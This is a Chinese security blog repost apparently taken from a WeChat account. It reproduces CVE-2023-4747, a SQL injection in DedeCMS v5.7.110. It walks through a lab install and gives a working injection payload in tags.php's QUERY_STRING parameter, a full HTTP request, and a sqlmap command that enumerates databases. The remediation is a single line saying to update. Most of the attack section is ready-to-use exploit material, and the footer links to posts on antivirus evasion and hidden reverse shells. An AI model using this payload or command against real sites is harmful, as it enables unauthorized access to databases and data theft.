CVE-2023-4747漏洞(附EXP)

admin 2023年9月7日17:29:20评论252 views字数 1387阅读4分37秒阅读模式

CVE-2023-4747漏洞(附EXP)

0x01 前言

   DEDECMS 是一种可以综合管理网站上各种栏目的通用工具,DedeCMS 是目前国内最强大、最稳定的中小型门户网站建设解决方案之一,基于 PHP + MySQL 的技术开发,全部源码开放。在最新版本中存在SQL注入漏洞。

CVE-2023-4747漏洞(附EXP)

0x02 影响平台

DedeCMS v5.7.110

0x03 环境搭建

官网地址:https://www.dedecms.com/源码信息:https://github.com/dedecms/DedeCMS

下载源码,利用phpstudy搭建,将此目录作为网站根目录

CVE-2023-4747漏洞(附EXP)

访问install/index.php默认安装即可:

http://127.0.0.1/install/index.php

CVE-2023-4747漏洞(附EXP)

傻瓜式操作~

CVE-2023-4747漏洞(附EXP)

0x04 漏洞复现

环境搭建成功页面是这个酱紫

CVE-2023-4747漏洞(附EXP)

EXP:

/tags.php?QUERY_STRING=/alias/NDT'

CVE-2023-4747漏洞(附EXP)

GET /tags.php?QUERY_STRING=/alias/NDT%27+and+1=1# HTTP/1.1Host: 192.168.0.126Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=lkhe6hs7rr5ap9tbn6vng68784Connection: close

CVE-2023-4747漏洞(附EXP)

sqlmap一把梭:

python2 sqlmap.py -u "http://192.168.0.126/tags.php?QUERY_STRING=/alias/*" --dbs --batch

CVE-2023-4747漏洞(附EXP)

0x05 修复方案

建议及时更新至最新版本

 CVE-2023-4747漏洞(附EXP)往期回顾

1111
  1.  | CVE-2023-33246 RCE漏洞(附EXP)

  2.  | 横向移动与域控权限维持方法总汇

  3.  | Apache HTTPd最新RCE漏洞复现

  4.  | CNVD-2023-34111 RCE漏洞(附EXP)

  5.  | Cobalt Strike免杀脚本生成器|cna脚本|bypassAV

  6.  | MySQL数据库利用姿势

  7.  | phpMyAdmin漏洞利用汇总

  8.  | 泛微E-Mobile任意文件上传漏洞(附EXP)

  9.  | 小技巧~用一条命令来隐藏反向Shell

  10.  New免杀ShellCode加载器(附下载)

  11.  | 红队攻防 | 解决HW被疯狂封IP姿势~(附下载)


 

  1. CVE-2023-4747漏洞(附EXP)

    关注我

    获得更多精彩

    CVE-2023-4747漏洞(附EXP)


  2. 觉得内容不错,就点下在看
    如侵权请私聊公众号删文

原文始发于微信公众号(EchoSec):CVE-2023-4747漏洞(附EXP)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月7日17:29:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-4747漏洞(附EXP)http://cn-sec.com/archives/2014371.html

发表评论

匿名网友 填写信息